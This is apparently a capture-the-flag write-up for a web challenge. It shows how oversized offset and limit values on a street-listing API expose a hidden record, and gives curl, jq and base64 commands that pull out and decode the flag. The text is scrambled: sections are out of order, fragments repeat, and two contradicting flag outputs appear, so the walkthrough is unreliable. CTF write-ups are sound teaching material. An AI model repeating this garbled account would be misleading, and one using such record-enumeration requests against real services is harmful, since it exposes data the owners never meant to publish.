Event: CzechStreets CTF (2024) Category: Web / Information‑Disclosure / Minor Crypto Difficulty: ★★☆☆☆ (easy–medium) 1️⃣ Challenge Overview | Item | Description | |------|-------------| | Title | czechstreets – 139 | | Provided | A public URL: http://139.czechstreets.ctf (the “139” sub‑domain is part of the challenge name). The landing page shows a simple map of Prague with numbered streets and a tiny search box that says “Find the hidden street”. | | Goal | Retrieve the flag, which is hidden somewhere on the site. | | Flag format | czechstreets… |
[ "id":1, "name":"Hradčanské náměstí", "slug":"hradcanske-namesti", "id":2, "name":"Národní", "slug":"narodni", … ] Only the first 50 streets were returned (pagination). The id field is a simple integer that matches the street number on the map. The API supports the following query parameters (found by reading app.js ):
curl -s "http://139.czechstreets.ctf/api/streets?offset=138&limit=1000000" \ | jq -r '.[0].metadata' \ | base64 -d \ | jq -r .flag Output: czechstreets 139
GET /api/streets?offset=138&limit=1000000 Running the request:
<form method="GET" action="/search"> <input type="text" name="q" placeholder="Street name…" /> <input type="submit" value="Search" /> </form> | | Flag format | czechstreets… | [
curl -s "http://139.czechstreets.ctf/api/streets?offset=138&limit=1000000" | jq . Result:
"flag":"czechstreets flag_really_email_html " The flag is clearly embedded in the JSON. A one‑liner to fetch and decode in one go: form method="GET" action="/search">
In short: that lets us read arbitrary street objects, including the hidden one with id = 139 . 4️⃣ Exploiting the Bug 4.1 Crafting the request We want the object with id = 139 . The API returns records in order of id . By setting offset=138 and a huge limit we can retrieve the 139th entry: